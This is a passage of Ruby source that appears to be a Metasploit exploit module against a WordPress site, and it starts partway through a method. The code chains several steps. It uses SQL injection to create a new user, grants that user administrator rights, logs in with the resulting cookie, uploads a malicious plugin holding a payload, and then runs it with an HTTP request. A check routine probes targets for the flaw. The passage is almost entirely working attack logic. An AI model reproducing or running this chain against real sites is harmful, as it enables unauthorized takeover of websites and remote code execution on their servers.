print_status('Uploading payload...')    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded    print_status("Executing the payload at #{payload_uri}...")    register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")    register_dir_for_cleanup("../#{plugin_name}")    send_request_cgi({      'uri' => payload_uri,      'method' => 'GET'    })  end  def exploit    create_sqli_instance    wordpress_sqli_initialize(@sqli)    begin      username = datastore['USERNAME']      password = datastore['PASSWORD']      email = datastore['EMAIL']      wordpress_sqli_create_user(username, password, email)      wordpress_sqli_grant_admin_privileges(username)      admin_cookie = wordpress_login(username, password)      fail_with(Failure::UnexpectedReply, 'Failed to log in to WordPress admin.') unless admin_cookie      upload_and_execute_payload(admin_cookie)    rescue SQLExecutionError => e      fail_with(Failure::UnexpectedReply, e.message)    end  end  def check    return CheckCode::Unknown unless wordpress_and_online?    print_status('Attempting SQLi test to verify vulnerability...')    create_sqli_instance    begin      if @sqli.test_vulnerable        CheckCode::Vulnerable('Target is vulnerable to SQLi!')      else        CheckCode::Safe('Target is not vulnerable or the SQLi test failed.')      end    rescue SQLExecutionError => e      print_error(e.message)      CheckCode::Unknown('Failed to verify SQLi vulnerability due to an error.')    end  endend

Tag

#linux